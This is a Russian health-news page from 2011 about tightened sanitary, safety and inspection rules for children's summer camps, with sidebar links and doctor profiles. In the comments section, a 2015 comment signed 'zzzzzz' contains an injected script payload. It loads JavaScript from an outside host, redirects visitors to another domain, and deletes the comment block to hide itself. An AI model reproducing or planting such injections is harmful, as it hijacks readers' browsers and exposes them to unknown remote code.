Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Детские лагеря: сезон 201...  >>  Детские лагеря: сезон 2011 объявляется открытым
 
Обратная связь
 

Детские лагеря: сезон 2011 объявляется открытым

Размер шрифта
02 июня 2011 12:05
  • google_analytics: false
  • Нравится

С 1 июня в действие вступили новые требования к устройству, содержанию и организации работы лагерей труда и отдыха для подростков. По уверениям разработчиков, новые нормы стали жестче, и проверок будет больше. Необходимость в них возникла еще летом 2010 года, когда помимо пожароопасной обстановки, сложившейся на территории России в прошлом году, были зафиксированы случаи отравлений и кишечных инфекций, а в Ейске утонуло шестеро детей и воспитатель.

Екатерина Олейникова / «Здоровье-инфо»

Особое внимание комиссия обращают на то, как организовано питание в лагере, что особенно актуально в свете последних событий с овощами из Европы и вспышками холеры на Украине.

Ужесточены требования к канализации, водопроводу, к ограждениям лагеря и его охране.

Раньше проверку любого детского учреждения можно было провести только с разрешения прокуратуры. Теперь же это ограничение снято, и работники Санэпиднадзора могут посещать детские лагеря до начала смены, один раз в смену и еще один раз после смены – без предупреждения и без разрешения прокуратуры.

Из 330 лечебно-оздоровительных центров в Подмосковье только 284 получили акты приемки и могут работать. Основные нарушения – все та же организация детского питания и несоблюдение пожарных норм. Кроме того, в список нарушений входит отсутствие противомоскитных сеток, нарушение режима уборки и дезинфекции, допуск людей к работе без полного медицинского обследования, нарушения режима, осмотра на педикулез, и так далее.

Все случаи кишечных инфекций связаны как раз с нарушением гигиенических норм. Сегодняшние СанПиН настолько жестко подходят и настолько детально регламентируют эти требования для летних оздоровительных лагерей, что «возникновение такого рода ситуации в этом году исключено».

Вопросу безопасности уделяется большое внимание. В 2011 году оборудованы кондиционерами поезда. За детьми постоянно должны наблюдать педагоги, медики и полиция.

Роль врача в детском лагере должна стать одной из главных. Полномочия, которыми врач отныне располагает, должны соответствовать тому уровню ответственности, которая на него возложена.

Да и вообще, кадры решают все. В том числе и в летних лагерях. Необходимо организовать детский отдых так, чтобы дети не слонялись без дела и постоянно были чем-то заняты. Это – полностью на совести воспитателей, которые принимают решение работать в летнем лагере, когда еще не закончился предыдущий сезон. Так что уже с прошлой осени ведутся обучающие семинары по подготовке квалифицированных кадров.

На сайтах многих лагерей подробно расписаны программы и все мероприятия на лето. Каждый лагерь, готовя свою программу отдыха, ставит цель предложить детям какую-то изюминку, чем-то отличиться от остальных. Так что ответственность лежит, в том числе, и на родителях, которые могут выбрать тот лагерь, где ребенку будет действительно интересно.

Стоимость путевки, по словам Панкова Д.Д., главного специалиста Департамента Здравоохранения города Москвы по гигиене детей и подростков, складывается из компенсации затрат на летний отдых. В некоторых регионах сразу компенсируется определенная сумма. В других регионах родители платят 10% от суммы, и эта компенсация теряется сразу же при покупке, а иным перечисляется через какое-то время. Средняя стоимость путевки составляет 9-15 тысяч рублей за 21 день.

Как всегда подобные прожекты на словах не могут не впечатлить и не могут не порадовать. Однако остаются вопросы: кто будет контролировать выполнение всех этих новых нормативов, как часто будут наведываться комиссии, будут ли подводиться промежуточные итоги? Одним словом, остается только надеяться, что радужные перспективы к концу лета 2011 станут столь же радужными воспоминаниями.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Ожирение можно предсказать сразу после рождения   Бесчувственный язык – причина ожирения   Чем его кормить?   Мойка посуды убивает детей  
26 ноября 2012Бесчувственный язык – причина ожирения 02 октября 2012Пассивное курение делает детей умственно отсталыми!
 
09 августа 2011Опасности школьного бутерброда 01 августа 2011Вспышка вирусной инфекции на Украине
 

Слайдшоу

1
Детские болезни, которые должна знать каждая мама. Часть 1
Какую еду должен есть ваш ребенок
Как вы убиваете своих детей

Тесты

Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.